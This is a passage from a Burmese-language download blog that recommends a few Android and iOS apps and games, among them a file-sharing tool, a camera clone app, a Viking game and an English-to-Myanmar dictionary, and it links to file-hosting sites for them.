က်န္တဲ့သူေတြက အဲဒီဆာဗာကို join ရပါမယ္…
 ေအာက္မွာ ပံုေလးေတြနဲ႔ ျပထားပါတယ္…
 file နဲ႔ app ေတြကို share ဖို႔ကေတာ့ 
ကိုယ္ ပို႔ခ်င္တဲ့သူရဲ႕ logo ေလးထဲကို ပို႔ခ်င္တဲ့ ဖိုင္ကို drag ဆြဲၿပီး ပို႔လိုက္ယံုပါပဲ… 

တစ္ခုထူးျခားတာက apk ဖိုင္မရွိပဲ install လုပ္ထားတဲ့ app ေတြကိုပါ share ၿပီး သံုးလို႔ရတာပါပဲ….
 game တြဲေဆာ့မယ္ဆိုရင္လည္း တစ္ေယာက္က ေဆာ့မယ့္game ကို ႏွိပ္ၿပီး start လုပ္လိုက္ပါ…
ဒါဆိုရင္ က်န္တဲ့ network တြင္းမွာရွိတဲ့သူေတြဆီကို request ေရာက္ပါမယ္..
 accept လုပ္ေပးလိုက္ရင္ တြဲေဆာ့လို႔ရပါၿပီ…  တစ္ကယ္ကိုေကာင္းပါတယ္… လိုခ်င္ရင္ ေအာက္မွာ ေဒါင္းသြားလိုက္ပါဗ်ာ…

Download>>>zippyshare

Clone Yourself - Camera v1.0.9 Apk 9MB

ဒီေကာင္ေလးကေတာ့ ဓာတ္ပုံရိုက္ ၀ါသနာပါတဲ့
 အကို အမ ညီ ညီမ ေတြ အတြက္ အဆင္ေျပမယ္ ေဆာစ့္၀ဲလ္ေလးပါ 
သူက ေနာက္ခံ ရႈခင္း တစ္မ်ဳိးထဲမွာ အိုင္တင္သံုးမ်ဳိးလုပ္ျပီး ဓာတ္ပံုရိုက္လုိ႔ရပါတယ္ 
နားလည္ေအာင္ေျပာရမယ္ဆိုရင္  ေနာက္ခံ ရႈခင္း တစ္မ်ဳိးထဲမွာ အုိင္တင္ေလးနဲ႔ 
ဓာတ္ပံုသံုးခါရိုက္ ျပီးရင္ တစ္ပံု မွာ အုိင္တင္သံုးမ်ဳိး ပံုေလးနဲ႔ ျဖစ္ေအာင္ လုပ္တဲ့ ေဆာစ့္၀ဲလ္ေလးပါ
ဓာတ္ကာလာေတြလည္း ျပင္ဆင္နိုင္တဲ့ လုပ္ေဆာင္ခ်က္လညး္ပါပါတယ္
အသံုးျပဳမယ္ဆို ေအာက္ကလိပ္စာမွာရယူနုိင္ပါတယ္ 
Dwonload>>>>zippyshare(or)Direct Download




BREAKER : A Viking Voyage for idevice


Angry Birds ဂိမ္းေတြ ထုတ္တဲ့ RAVIO ကုပၼဏီကေန အသစ္ထက္မံထုတ္လုပ္လိုက္တဲ့ ဂိမ္းေလးပါ။ 

မေန႔က apps store ေပၚ စတင္ျဖန္႔ခ်ီပါတယ္။ angry birds ကထုတ္တဲ့ ဂိမ္းဆိုေတာ့ အထူးတလည္ မေျပာေနေတာ့ပါဘူး စမ္းၾကည္႔ေစခ်င္ပါတယ္
                                                                download link by mediafire

English To Myanmar Dictionary Version 1.0 ( 2 MB )

အရြယ္အစားကေတာ့ ေသးေသးေလးပါ..ဒါေပမယ့္ အလြန္ကိုဘဲ သံုးလို႕ေကာင္းတဲ့ English To Myanmar
Dictionary ေလးျဖစ္ပါတယ္..အသံထြက္မသိတဲ့စကားလံုးမ်ားအတြက္လည္း အသံထြက္ခုိင္းလို႕ရပါတယ္.
အခ်ိဳ႕အေရးၾကီးေသာ စကားလံုးေတြမွာဆိုရင္ ပံုနဲ႕ပါျပေပးပါတယ္..မသိေသးသူမ်ားအတြက္ကေတာ့
အသစ္ေပါ့ဗ်ာ...ကဲ


Related Posts Plugin for WordPress, Blogger...